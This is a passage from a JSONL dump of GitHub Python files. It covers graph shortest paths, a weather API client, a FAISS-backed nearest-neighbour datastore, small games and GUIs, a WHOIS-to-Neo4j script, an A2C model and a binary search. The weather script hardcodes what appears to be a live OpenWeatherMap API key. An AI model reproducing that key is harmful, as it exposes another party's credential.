edge['weight']\nelse:\n    print('Manual matrix input is required for this script; exiting.')\n    raise SystemExit\n\nadjTable = PrettyTable(['-'] + [i for i in V])\nfor i in range(len(adjMatrix)):\n    adjTable.add_row([V[i]] + adjMatrix[i])\nprint(adjTable)\n\ndistTable = PrettyTable(['-'] + [i for i in V])\nfor i in range(len(adjMatrix)):\n    distTable.add_row([V[i]] + BellmanFord(adjMatrix, i))\nprint(distTable)\n","repo_name":"AGaziev/graphTheory","sub_path":"shortPaths.py","file_name":"shortPaths.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43083818791","text":"import requests\r\n\r\ncity = \"Moscow,RU\"\r\nappid = \"5f90996e12146e1a6fd86b5087ce1ddf\"\r\nres = requests.get(\"http://api.openweathermap.org/data/2.5/weather\",\r\n                   params={'q': city, 'units': 'metric', 'lang': 'ru', 'APPID': appid})\r\ndata = res.json()\r\nprint(\"Wind speed and visibility forecast for today\")\r\nprint('Wind speed: ', data['wind']['speed'], ' m/s')\r\nprint(\"Visibility: \", (data['visibility'] / 10000) * 100, '%')\r\nprint('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')\r\n","repo_name":"ParfilovSergey/weather","sub_path":"лз2-дз1.py","file_name":"лз2-дз1.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2052258771","text":"import argparse\nimport os\nimport numpy as np\nimport json\nimport torch\nimport faiss\nimport time\nimport glob\nimport pickle as pkl\n\nfrom tqdm import tqdm\nfrom scipy.special import log_softmax\n\nfrom collections import defaultdict, Counter\n\n#import tracemalloc\nimport os\nimport psutil\n# tracemalloc.start()\npid = os.getpid()\npython_process = psutil.Process(pid)\n\ndef print_mem_use():\n    #memUse = tracemalloc.get_traced_memory()[1]/(1024*1024*1024)\n    memUse = python_process.memory_info()[0]/2.**30 # memory use in GB...I think\n    print('memory use: %.1fGB' % memUse)\n\ndef load_embs(embed_path, dstore_size, dimension):\n    assert os.path.exists(embed_path), embed_path\n    return np.memmap(embed_path,\n                     dtype=np.float16,\n                     mode=\"r\",\n                     shape=(dstore_size, dimension))\n\nclass DataStore(object):\n    def __init__(self,\n                 setting=None,\n                 data_path=None,\n                 model_dir=None,\n                 do_load_data=True,\n                 do_load_embeds=True,\n                 do_load_index=True,\n                 dimension=1024,\n                 ncentroids=4096,\n                 code_size=64,\n                 probe=8,\n                 num_keys_to_add_at_a_time=1000000,\n                 remove_stopwords=False,\n                 remove_stopwords_except_k=None,\n                 restricted=None,\n                 consider_string_boundary=True,\n                 cuda=True,\n                 embs_consider_boundary=False,\n                 keep_uint8=False\n                 ):\n\n        base_dir = \"corpus\"\n        if setting in [\"enwiki-0\", \"enwiki-2022-0\"]:\n            data_path = os.path.join(base_dir, setting[:-2], \"0.npy\")\n            if model_dir is not None:\n                model_dir = os.path.join(model_dir, setting)\n        elif setting in [\"enwiki\", \"enwiki-2022\"]:\n            data_path=[os.path.join(base_dir, setting, \"{}.npy\".format(idx)) for idx in range(20)]\n            if model_dir is not None:\n                model_dir=[os.path.join(model_dir, \"{}-{}\".format(setting, idx)) for idx in range(20)]\n            ncentroids *= 8\n        elif setting in [\"cc_news\", \"imdb\", \"amazon\", \"subj\"]:\n            data_path = os.path.join(base_dir, setting, \"text.npy\")\n            if model_dir is not None:\n                model_dir = os.path.join(model_dir, setting)\n        else:\n            raise NotImplementedError(setting)\n\n        assert not (remove_stopwords and remove_stopwords_except_k)\n\n        self.setting = setting\n        self.dimension = dimension\n        self.ncentroids = ncentroids\n        self.code_size = code_size\n        self.probe = probe\n        self.num_keys_to_add_at_a_time = 
num_keys_to_add_at_a_time\n self.remove_stopwords = remove_stopwords\n self.remove_stopwords_except_k = remove_stopwords_except_k\n self.restricted = restricted\n self.consider_string_boundary = consider_string_boundary\n self.cuda = cuda\n self.embs_consider_boundary = embs_consider_boundary\n self.keep_uint8 = keep_uint8\n\n '''\n restricted can be either\n - an instance of the class `Task`\n - a list of integers: a list of block indices you will be restricted to\n - a list of strings: a list of inputs, if these are all you will use, so that a list of\n block indices can be computed offline\n - a dictionary: string->a list of intergers, precomputed BM25 block indices\n - True: meaning you will use restricted search but on the fly. this will load all the embeddings\n - False or None: you will not use restricted search\n '''\n\n if self.restricted:\n from npm.searcher import BM25Searcher\n data_dir = os.path.join(base_dir, setting)\n index_dir = os.path.join(base_dir, setting + \"-index\")\n self.searcher = BM25Searcher(data_dir, index_dir)\n self.restricted, self.restricted_dict = self.searcher.batch_search(self.restricted)\n\n self.load_restricted = self.restricted and type(self.restricted)!=bool\n print (\"load_restricted:\", self.load_restricted)\n\n if do_load_data:\n self.load_data(data_path)\n\n print_mem_use()\n\n if do_load_embeds:\n assert model_dir is not None\n assert do_load_data\n self.load_embeds(model_dir)\n\n print_mem_use()\n\n if do_load_index:\n assert model_dir is not None\n self.load_index(model_dir)\n\n def load_stopwords(self):\n if self.remove_stopwords or self.remove_stopwords_except_k:\n stopwords = set()\n with open(os.path.join(\"config\", \"roberta_stopwords.txt\")) as f:\n for line in f:\n stopwords.add(int(line.strip()))\n else:\n stopwords = None\n return stopwords\n\n def load_data(self, data_path):\n self.input_ids = []\n self.token_idx_to_block_idx = []\n self.token_idx_to_local_idx = []\n self.emb_token_idx_to_orig_block_idx = []\n self.orig_block_idx_to_emb_token_idx = []\n\n # for debugging, later we can delete this\n self.orig_block_idx_to_valid_start = {}\n self.orig_block_idx_to_valid_end = {}\n\n stopwords = self.load_stopwords()\n dstore_size_list = []\n\n if type(data_path)==list:\n data_paths = data_path\n else:\n data_paths = [data_path]\n\n offset = 0\n global_dstore_size = 0\n global_true_dstore_size = 0\n true_dstore_size_list = []\n\n if self.load_restricted:\n self.orig_emb_token_indices_valid = set()\n\n print_mem_use()\n\n for data_path_idx, _data_path in enumerate(data_paths):\n input_ids = np.load(_data_path)\n\n start_end_pairs = np.load(_data_path.replace(\".npy\", \"_blocks.npy\"))\n if self.consider_string_boundary:\n with open(_data_path.replace(\".npy\", \"_valid.pkl\"), \"rb\") as f:\n valid_candidates = pkl.load(f)\n\n dstore_size = 0\n true_dstore_size = 0\n offset_block = 0 if self.input_ids is None else len(self.input_ids)\n\n remove_stopwords = self.remove_stopwords or (\n self.remove_stopwords_except_k is not None and data_path_idx >= self.remove_stopwords_except_k)\n\n for block_idx, (valid_start, valid_end) in enumerate(tqdm(valid_candidates)):\n start = start_end_pairs[block_idx]\n end = start_end_pairs[block_idx+1] if block_idx0:\n valid_start = np.array([idx for idx in valid_start if idx not in stopword_indices], dtype=np.uint8)\n valid_end = np.array([idx for idx in valid_end if idx not in stopword_indices], dtype=np.uint8)\n self.orig_block_idx_to_valid_start[offset] = valid_start\n 
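# valid_start / valid_end record, per block, which local token offsets may\n            # begin or end a retrieved span (stopword positions are filtered out above)\n            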
self.orig_block_idx_to_valid_end[offset] = valid_end\n\n                dstore_size += curr_dstore_size\n                global_dstore_size += curr_dstore_size\n                if is_valid:\n                    true_dstore_size += curr_dstore_size\n                    global_true_dstore_size += curr_dstore_size\n                self.input_ids.append(curr_input_ids)\n                offset += 1\n\n            dstore_size_list.append(dstore_size)\n            true_dstore_size_list.append(true_dstore_size)\n            print (\"Finished reading %.3fM tokens from %s\" % (dstore_size/1000000, _data_path))\n            print_mem_use()\n\n            self.orig_block_idx_to_emb_token_idx.append(global_true_dstore_size)\n\n        self.token_idx_to_block_idx = np.array(self.token_idx_to_block_idx)\n        self.token_idx_to_local_idx = np.array(self.token_idx_to_local_idx, dtype=np.uint8)\n        self.dstore_size_list = dstore_size_list\n        self.dstore_size = np.sum(dstore_size_list)\n        self.true_dstore_size_list = true_dstore_size_list\n        self.true_dstore_size = np.sum(true_dstore_size_list)\n\n    def load_embeds(self, model_dir):\n        if type(model_dir)==list:\n            self.embs = []\n            for shard_idx, (_model_dir, dstore_size) in enumerate(zip(model_dir, self.dstore_size_list)):\n                remove_stopwords = self.remove_stopwords or (\n                    self.remove_stopwords_except_k is not None and shard_idx >= self.remove_stopwords_except_k)\n                postfix = \"_wo_stopwords\" if remove_stopwords else \"\"\n                embed_path = os.path.join(_model_dir,\n                                          \"embeddings{}.float16.npy\".format(postfix))\n                print (\"Start loading the embed from %s with (%d, %d)...\" % (embed_path.split(\"/\")[-2], dstore_size, self.dimension))\n                curr_emb = load_embs(embed_path, dstore_size, self.dimension)\n                self.embs.append(curr_emb)\n        else:\n            postfix = \"_wo_stopwords\" if self.remove_stopwords else \"\"\n            embed_path = os.path.join(model_dir, \"embeddings{}.float16.npy\".format(postfix))\n            print (\"Start loading the embed with (%d, %d)...\" % (self.dstore_size, self.dimension))\n            self.embs = load_embs(embed_path, self.dstore_size, self.dimension)\n\n        if self.load_restricted:\n            if type(self.embs)==list:\n                offset = 0\n                for i, (emb, dstore_size) in enumerate(zip(self.embs, self.dstore_size_list)):\n                    assert i>0 or offset==0\n                    curr_restricted = sorted([j-offset for j in self.orig_emb_token_indices_valid\n                                              if offset<=j<offset+dstore_size])\n                    if len(curr_restricted)>0:\n                        curr_restricted = np.array(curr_restricted)\n                        self.embs[i] = emb[curr_restricted]\n                        assert self.embs[i].shape[0]==self.true_dstore_size_list[i]\n                    else:\n                        assert self.true_dstore_size_list[i]==0\n                    offset += dstore_size\n\n                assert np.sum([emb.shape[0] for emb in self.embs])==self.true_dstore_size\n            else:\n                self.embs = self.embs[sorted(self.orig_emb_token_indices_valid)]\n                assert self.embs.shape[0]==len(self.orig_emb_token_indices_valid)==self.true_dstore_size\n            print (\"Finished loading embs.shape=%s\" % str(self.embs.shape))\n\n    def load_index(self, model_dir):\n        if type(model_dir)==list:\n            model_dir = model_dir[-1] + \".combined\"\n            if not os.path.exists(model_dir):\n                os.makedirs(model_dir)\n\n        index_path = os.path.join(model_dir.replace(\"*\", \"\"),\n                                  \"embeddings{}.faiss_index_IP\".format(\"_wo_stopwords\" if self.remove_stopwords else \"\"))\n        print (\"Starting loading %s\" % index_path)\n\n        if os.path.exists(index_path):\n            self.index = faiss.read_index(index_path)\n            self.index.nprobe = self.probe\n        else:\n            print (\"No index found from %s -- start building index!\" % index_path)\n            if not os.path.exists(index_path + \".trained\"):\n                self._train_index(index_path)\n            self.index = self._add_keys(index_path)\n\n    def get_embs(self, indices):\n        if type(self.embs)==list:\n            if type(indices) in [int, np.int64]:\n                offset = 0\n                for idx, dstore_size 
in enumerate(self.true_dstore_size_list):\n if offset <= indices < offset+dstore_size:\n return self.embs[idx][indices-offset].astype(np.float32)\n offset += dstore_size\n # it should be returned\n raise NotImplementedError()\n else:\n embs = []\n for _indices in indices:\n embs.append(self.get_embs(_indices))\n return np.stack(embs, 0)\n\n return self.embs[indices].astype(np.float32)\n\n def get_block_idx_and_token(self, i, token_only=False):\n if type(i)==list:\n return [self.get_block_idx_and_token(j, token_only=token_only) for j in i]\n if token_only:\n return self._get_token(i)[1]\n return self._get_token(i)\n\n def get_context(self, i, decode_func):\n if type(i)==list:\n return [self.get_context(j, decode_func) for j in i]\n\n block_i, token_i = self.token_idx_to_block_idx[i], self.token_idx_to_local_idx[i]\n input_ids = self.input_ids[block_i]\n #input_ids = self.blocks[block_i][\"input_ids\"]\n return decode_func(input_ids, token_i)\n\n def get_frequency(self, tokens):\n return [self.token_counter.get(token, 0) for token in tokens]\n\n def search(self, query_embs, k=4096):\n all_scores, all_indices = self.index.search(query_embs.astype(np.float32), k)\n return all_scores, all_indices\n\n def get_knn_scores(self, query_emb, indices, distance_type=\"l2\", temperature=1.0):\n '''\n query_emb: [batch_size, dimension]\n indices: [batch_size, k]\n self.get_embs(indices): [batch_size, k, dimension]\n distances: [batch_size, k]\n '''\n scores = np.squeeze(np.matmul(\n self.get_embs(indices), np.expand_dims(query_emb, -1)), -1)\n scores /= np.sqrt(self.dimension)\n knn_scores = np.exp(scores / temperature)\n return knn_scores\n\n def get_prediction_and_knn_prob(self,\n knn_scores,\n indices,\n gt_token,\n gt_token_idx=None,\n exclude_level=None):\n '''\n gt_token_idx and exclude_level are only specified\n if the evaluation data and the corpus data are the same\n '''\n if gt_token_idx is not None and exclude_level is not None:\n assert exclude_level in [\"token\", \"block\", \"doc\"]\n gt_block, _gt_token = self.get_block_idx_and_token(gt_token_idx)\n assert gt_token==_gt_token\n else:\n assert gt_token_idx is None and exclude_level is None\n\n score_per_token = self.init_score_per_token.copy()\n included_tokens = set()\n tot = self.init_score_sum\n for idx, knn_score in zip(indices, knn_scores):\n block, pred = self._get_token(idx)\n if pred==\"EOS\":\n continue\n if exclude_level is not None:\n if exclude_level==\"token\" and idx==gt_token_idx:\n continue\n elif exclude_level==\"block\" and gt_block==block:\n continue\n elif exclude_level==\"doc\" and self.block_idx_to_doc_idx[block]==self.block_idx_to_doc_idx[gt_block]:\n continue\n included_tokens.add(pred)\n score_per_token[pred] += knn_score\n tot += knn_score\n\n sorted_tokens = sorted(included_tokens, key=lambda x: -score_per_token[x])\n knn_prob = score_per_token[gt_token] / tot\n return sorted_tokens, np.log(knn_prob)\n\n def _get_token(self, token_idx):\n block_i, token_i = self.token_idx_to_block_idx[token_idx], self.token_idx_to_local_idx[token_idx]\n input_ids = self.input_ids[block_i]\n assert token_i < len(input_ids)\n token_i = input_ids[token_i]\n return block_i, token_i\n\n def _get_token_position(self, token_idx, ngram_before=1, ngram_after=1):\n if type(token_idx)==list:\n return [self._get_token_position(_token_idx,\n ngram_before=ngram_before,\n ngram_after=ngram_after)\n for _token_idx in token_idx]\n block_i, token_i = self.token_idx_to_block_idx[token_idx], self.token_idx_to_local_idx[token_idx]\n #input_ids = 
self.blocks[block_i][\"input_ids\"]\n        input_ids = self.input_ids[block_i]\n        assert token_i < len(input_ids)\n\n        if ngram_before==1:\n            # just take ngram after this\n            token_range = [token_i]\n            for j in range(token_i+1, min(len(input_ids), token_i+ngram_after)):\n                if input_ids[j] in [0, 2]:\n                    break\n                token_range.append(j)\n        elif ngram_after==1:\n            token_range = [token_i]\n            for j in range(token_i-1, max(0, token_i-ngram_before+1), -1):\n                if input_ids[j] in [0, 2]:\n                    break\n                token_range = [j] + token_range\n        else:\n            raise NotImplementedError()\n\n        assert np.all([i+1==j for i, j in zip(token_range, token_range[1:])])\n        return block_i, token_range, [input_ids[i] for i in token_range]\n\n    def _train_index(self, index_path):\n        start = time.time()\n        quantizer = faiss.IndexFlatIP(self.dimension)\n        start_index = faiss.IndexIVFPQ(quantizer,\n                                       self.dimension,\n                                       self.ncentroids,\n                                       self.code_size,\n                                       8)\n        start_index.nprobe = self.probe\n        np.random.seed(1)\n\n        print (\"Sampling for training the index (from %d tokens)\" % (self.true_dstore_size))\n        if type(self.embs)==list:\n            sampled_embs = []\n            for emb in tqdm(self.embs):\n                sampled_indices = np.random.choice(np.arange(emb.shape[0]),\n                                                   size=[min(1000000, emb.shape[0])],\n                                                   replace=False)\n                sampled_embs.append(emb[sampled_indices])\n            print (\"Finish sampling; now concatenating...\")\n            sampled_embs = np.concatenate(sampled_embs, 0).astype(np.float32)\n        else:\n            random_sample = np.random.choice(np.arange(self.true_dstore_size),\n                                             size=[min(1000000, self.true_dstore_size)],\n                                             replace=False)\n            sampled_embs = self.get_embs(random_sample) # already converted into float32\n\n        print (\"Training examples sampled; now start training...\")\n\n        if self.cuda:\n            # Convert to GPU index\n            res = faiss.StandardGpuResources()\n            co = faiss.GpuClonerOptions()\n            co.useFloat16 = True\n            gpu_index = faiss.index_cpu_to_gpu(res, 0, start_index, co)\n            gpu_index.verbose = False\n\n            # Train on GPU and back to CPU\n            gpu_index.train(sampled_embs)\n            start_index = faiss.index_gpu_to_cpu(gpu_index)\n        else:\n            # Faiss does not handle adding keys in fp16 as of writing this.\n            start_index.train(sampled_embs)\n\n        print ('Training took {} s'.format(time.time() - start))\n        faiss.write_index(start_index, index_path + \".trained\")\n\n    def _add_keys(self, index_path):\n        index = faiss.read_index(index_path + \".trained\")\n        start_time = time.time()\n\n        if type(self.embs)==list:\n            tot = 0\n            for i, emb in enumerate(self.embs):\n                dstore_size = emb.shape[0]\n                start = 0\n                while start < dstore_size:\n                    end = min(dstore_size, start + self.num_keys_to_add_at_a_time)\n                    to_add = emb[start:end].astype(np.float32) # get_embs() takes a single indices argument; slice this shard's memmap directly\n                    index.add(to_add)\n                    tot += (end-start)\n                    start = end\n                print ('idx=%d finished -- Added %d tokens (%d min)' % (\n                    i, tot, (time.time()-start_time)/60))\n            faiss.write_index(index, index_path)\n            print (\"Finish writing index (%dmin)\" % ((time.time()-start_time)/60))\n        else:\n            start = 0\n            while start < self.true_dstore_size:\n                end = min(self.true_dstore_size, start + self.num_keys_to_add_at_a_time)\n                to_add = self.get_embs(range(start, end)).copy()\n                index.add(to_add)\n                start = end\n\n                if (start % 1000000) == 0:\n                    print ('Added %d tokens (%d min)' % (start, (time.time()-start_time)/60))\n                    faiss.write_index(index, index_path)\n\n            print (\"Adding total %d keys\" % start)\n            print ('Adding took {} s'.format(time.time() - start_time))\n        faiss.write_index(index, index_path)\n        return index\n\nclass DataStoreUnion(DataStore):\n    def __init__(self, setting, **kwargs):\n        self.dstores = []\n        for _setting in 
setting.split(\"+\"):\n self.dstores.append(DataStore(setting=_setting, **kwargs))\n self.dimension = self.dstores[0].dimension\n\n def search(self, queries, k):\n all_scores, all_indices = [], []\n for dstore_idx, dstore in enumerate(self.dstores):\n scores, indices = dstore.search(queries, k)\n all_scores.append(scores)\n all_indices.append(indices)\n\n return np.stack(all_scores, 0), np.stack(all_indices, 0)\n\n def get_block_idx_and_token(self, indices, token_only):\n assert token_only # not implemented otherwise\n assert len(indices)==len(self.dstores)\n tokens = None\n for dstore, _indices in zip(self.dstores, indices):\n curr_tokens = dstore.get_block_idx_and_token(_indices, token_only=True)\n if tokens is None:\n tokens = curr_tokens.copy()\n else:\n for i, (_tokens, _curr_tokens) in enumerate(zip(tokens, curr_tokens)):\n tokens[i] += _curr_tokens\n return tokens\n\n def get_embs(self, indices):\n assert len(indices)==len(self.dstores)\n embs = []\n for dstore, _indices in zip(self.dstores, indices):\n embs.append(dstore.get_embs(_indices))\n return embs\n\n\n","repo_name":"facebookresearch/NPM","sub_path":"npm/dstore.py","file_name":"dstore.py","file_ext":"py","file_size_in_byte":23427,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"53"} +{"seq_id":"28810530778","text":"name = \"\"\nname = input(\"Please input your name \\n\").capitalize()\nwhile name == \"\":\n name = input(\"Please input your name \\n\").capitalize() \n\ndef parse_adventure_response(reply):\n reply_lower = reply.lower()\n response_array = reply_lower.split()\n if \"yes\" not in response_array:\n return(\"well this was all a bit pointless...\") \n return (\"Excellent choice! Space cat approves!\")\n\n\nadventure_response = input(\"Welcome {name} Would you like to go on an adventure? (yes/no) \\n\".format(name = name))\nprint(parse_adventure_response(adventure_response))\n\n\n\n# if adventure_response.lower() == \"no\":\n# print (\"Seriously?!? OK have a nice day!\")\n# elif adventure_response.lower() == \"yes\":\n# adventurer = input(\"Great stuff, now choose your character: \\n 1 = Pirate \\n 2 = Space cat \\n\")\n# if adventurer == 1:\n# print(\"good choice, lets go!\")\n# else:\n# print(\"Space cats only sleep they dont go on adventures! :D\")\n\n\n","repo_name":"AlexBerry1983/TextAdventure_codecademy","sub_path":"text_adventure.py","file_name":"text_adventure.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10125720795","text":"\"\"\"Given the root of a binary tree, return the zigzag level order traversal of its nodes' values. 
(i.e., from left to right, then right to left for the next level and alternate between).\n\n \n\nExample 1:\n\n\nInput: root = [3,9,20,null,null,15,7]\nOutput: [[3],[20,9],[15,7]]\nExample 2:\n\nInput: root = [1]\nOutput: [[1]]\nExample 3:\n\nInput: root = []\nOutput: []\n \n\nConstraints:\n\nThe number of nodes in the tree is in the range [0, 2000].\n-100 <= Node.val <= 100\"\"\"\n\nfrom typing import List\n# Definition for a binary tree node.\nclass TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\nclass Solution:\n    def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n        if not root:\n            return []  # an empty tree yields an empty traversal\n        if not root.left and not root.right:\n            return [[root.val]]\n        self.d = {}\n        def zigzag(root, level):\n            if not root:\n                return\n            if level not in self.d.keys():\n                self.d[level] = [root.val]\n            else:\n                if level % 2 == 0:\n                    self.d[level].append(root.val)\n                else:\n                    self.d[level] = [root.val] + self.d[level]\n            zigzag(root.left, level+1)\n            zigzag(root.right, level+1)\n        zigzag(root, 0)\n        return [v for k,v in self.d.items()]\n    ","repo_name":"nicokuzak/leetcode","sub_path":"medium/trees/zigzag_level_order_traversal.py","file_name":"zigzag_level_order_traversal.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7034900082","text":"from tkinter import*\nventana=Tk()\nventana.geometry(\"500x300+100+100\")\nventana.title(\"Botones\")\nlblUsuario=Label(text=\"Usuario:\",font=(\"Agency FB\",14)).place(x=10,y=10)\n# CREATING A TEXT FIELD\nentradaU=StringVar()\n#entradaU.set(\"LESH\")\ntxtUsuario=Entry(ventana,textvariable=entradaU).place(x=70,y=20)\nlblNombre=Label(text=\"Nombre:\",font=(\"Agency FB\",14)).place(x=10,y=50)\nentradaN=StringVar()\n#entradaN.set(\"Luis Enrique Sosa Hernandez\")\ntxtNombre=Entry(ventana,textvariable=entradaN,width=30).place(x=70,y=60)\n# Create buttons\nbtnSaludar=Button(ventana,text=\"Saludar\",font=(\"Agency FB\",14),width=10).place(x=300,y=20)\nbtnDespedir=Button(ventana,text=\"Despedir\",font=(\"Agency FB\",14),width=10).place(x=300,y=80)\nventana.mainloop()\n","repo_name":"LuisEnriqueSosaHernandez/Python","sub_path":"Botones.py","file_name":"Botones.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15302227677","text":"import os\nimport json\nfrom py2neo import Graph, Node, Relationship\nimport yaml\n\n\ndef whois(data):\n\n    try:\n        from urllib.request import urlopen\n    except ImportError:\n        from urllib2 import urlopen\n    \n    with open('../config.yaml','r') as f:\n        conf = yaml.safe_load(f)  # yaml.load without a Loader is unsafe and deprecated\n\n    domainName = data\n    apiKey = conf['whoisData']['apikey']\n\n    url = 'https://www.whoisxmlapi.com/whoisserver/WhoisService?'\\\n    + 'domainName=' + domainName + '&apiKey=' + apiKey + \"&outputFormat=JSON\"\n\n    response = urlopen(url).read().decode('utf8')\n    jsonResponse = json.loads(response)\n    \n    return jsonResponse\n\n\ndef insertWhois(data, graph):\n\n    if(data != 0):\n        c = Node(\"Whois\", data = data[\"WhoisRecord\"][\"registryData\"][\"registrant\"][\"organization\"])\n        ip_node = graph.nodes.match(\"IP\", data=data[\"WhoisRecord\"][\"domainName\"]).first()\n        c_node = graph.nodes.match(\"Whois\", data = data[\"WhoisRecord\"][\"registryData\"][\"registrant\"][\"organization\"]).first()\n\n        if(c_node):\n            rel = Relationship(ip_node, \"HAS_WHOIS\", c_node)\n            graph.create(rel)\n            print(\"Existing whois node 
linked\")\n else:\n graph.create(c)\n rel = Relationship(ip_node, \"HAS_WHOIS\", c)\n graph.create(rel)\n print(\"New whois node created and linked\")\n return 1\n else:\n print(\"No whois Entry\")\n return 0\n","repo_name":"CYBEX-P/ti-graph","sub_path":"tiweb/whoisXML.py","file_name":"whoisXML.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74923139049","text":"from urllib.request import Request, urlopen\nfrom urllib.error import URLError, HTTPError\n\nreq = Request(\"http://wfa.uni.wroc.pl/pl/tu-nic-nie-ma\")\n\ntry:\n response = urlopen(req)\nexcept HTTPError as e:\n if e.code == 404:\n print(\"Błąd HTTP:\", e.code, \"- Podana strona nie istnieje\")\n else:\n print(\"Serwer nie mógł spełnić twojego żądania\")\n print(\"Błąd HTTP:\", e.code)\nexcept URLError as e:\n print(\"Nie udało się połączyć z serwerem\")\n print(\"Powód:\", e.reason)\nelse:\n print(\"Podany adres URL jest poprawny oraz dostępny w sieci\")\n","repo_name":"tTargiel/UNI-Python-Programming","sub_path":"Lista 11/zadanie_01.py","file_name":"zadanie_01.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39095815677","text":"import tensorflow as tf\n\ndef sample(probs):\n random_uniform = tf.random_uniform(tf.shape(probs))\n scaled_random_uniform = tf.log(random_uniform) / probs\n return tf.argmax(scaled_random_uniform, axis=1)\n\nclass Model():\n\n def __init__(self, policy, observation_space, action_space, nsteps, learning_rate, decay):\n self.learning_rate = learning_rate\n self.sess = tf.Session()\n\n self.actions = tf.placeholder(tf.int32, [nsteps])\n self.advantage = tf.placeholder(tf.float32, [nsteps])\n self.rewards = tf.placeholder(tf.float32, [nsteps])\n\n self.model = policy(observation_space, action_space)\n\n logits = tf.reduce_sum(tf.one_hot(self.actions, action_space) *\n tf.log(self.model.policy + 1e-13), axis=1)\n\n self.loss_policy = -tf.reduce_mean(self.advantage * logits)\n\n self.loss_value = tf.reduce_mean(tf.squared_difference(self.model.values, self.rewards))\n\n loss = self.loss_policy + self.loss_value\n self.optimizer = tf.train.RMSPropOptimizer(learning_rate=self.learning_rate, decay=decay).minimize(loss)\n\n self.sampled_action = sample(self.model.policy)\n tf.global_variables_initializer().run(session=self.sess)\n\n def predict(self, observation):\n actions, values = self.sess.run([self.sampled_action, self.model.values],\n {self.model.inputs: [observation]})\n return actions[0], values[0]\n\n def predict_value(self, observation):\n return self.sess.run(self.model.values, {self.model.inputs: [observation]})\n\n def train(self, observations, rewards, actions, values):\n advantage = rewards - values\n loss_policy, loss_value, _ = self.sess.run(\n [self.loss_policy, self.loss_value, self.optimizer],\n {\n self.model.inputs: observations,\n self.actions: actions,\n self.advantage: advantage,\n self.rewards: rewards\n }\n )\n return loss_policy, loss_value\n","repo_name":"saschaschramm/A2C","sub_path":"a2c/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74453434406","text":"arr, targets = input('Enter Input : ').split('/')\narr = list(map(int, arr.split(' ')))\ntargets = list(map(int, targets.split(' ')))\n\n\ndef first_less_value(arr, target):\n 
arr.sort()\n\n    low = 0\n    high = len(arr) - 1 \n\n    ans = -1\n    while low <= high:\n        mid = low + (high - low)//2\n\n        if arr[mid] >= target:\n            high = mid - 1\n        else:\n            ans = mid\n            low = mid + 1\n    \n    if ans == -1:\n        return 'No first less value'\n\n    return arr[ans]\n\n\n\n\nfor target in targets:\n    print(first_less_value(arr, target))","repo_name":"Charonyx/DataStruct2564","sub_path":"Chap10 Searching/firstless.py","file_name":"firstless.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15619639714","text":"import pygame\nimport json\n\npygame.init()\n\n# Define the colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\n# Define the screen dimensions\nWIDTH = 800\nHEIGHT = 600\n\n# Initialize the screen\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Armazenamento de Nome e Pontuação\")\n\n# Load the existing player dictionary from the JSON file, if any\ntry:\n    with open(\"players.json\", \"r\") as file:\n        players = json.load(file)\nexcept FileNotFoundError:\n    players = {}\n\nplayer_name = \"\"\nplayer_score = 0\n\nrunning = True\nwhile running:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            running = False\n        elif event.type == pygame.KEYDOWN:\n            if event.key == pygame.K_RETURN:\n                # When the player presses Enter, add the name and score to the player dictionary\n                if player_name:\n                    players[player_name] = player_score\n                    with open(\"players.json\", \"w\") as file:\n                        json.dump(players, file)\n                    player_name = \"\"\n                    player_score = 0\n            elif event.key == pygame.K_BACKSPACE:\n                # When the player presses Backspace, remove the last character of the name\n                player_name = player_name[:-1]\n            elif event.key == pygame.K_UP:\n                # When the player presses the up arrow, increase the score\n                player_score += 1\n            elif event.key == pygame.K_DOWN:\n                # When the player presses the down arrow, decrease the score (minimum 0)\n                player_score = max(0, player_score - 1)\n            else:\n                # Add the typed character to the player name\n                player_name += event.unicode\n\n    screen.fill(BLACK)\n    font = pygame.font.Font(None, 36)\n    text = font.render(\"Digite seu nome: \" + player_name, True, WHITE)\n    text_rect = text.get_rect(center=(WIDTH // 2, HEIGHT // 2 - 50))\n    screen.blit(text, text_rect)\n    '''\n    score_text = font.render(\"Pontuação: \" + str(player_score), True, WHITE)\n    score_rect = score_text.get_rect(center=(WIDTH // 2, HEIGHT // 2 + 50))\n    screen.blit(score_text, score_rect)\n    '''\n    pygame.display.flip()\n\npygame.quit()","repo_name":"anaclaramartinelli/ana_lucca_marcos","sub_path":"ranking.py","file_name":"ranking.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74871382246","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\n\n################################\n# Reconstruction visualization #\n################################\n\nimg = cv2.imread(\"large-noise-solid.png\", 0) / 255\npicked_rows = [0, 2, 5, 8]\n\nfig, axes = plt.subplots(len(picked_rows), 3)\nSCALE = 1.2\nfig.set_figheight(5.0 * 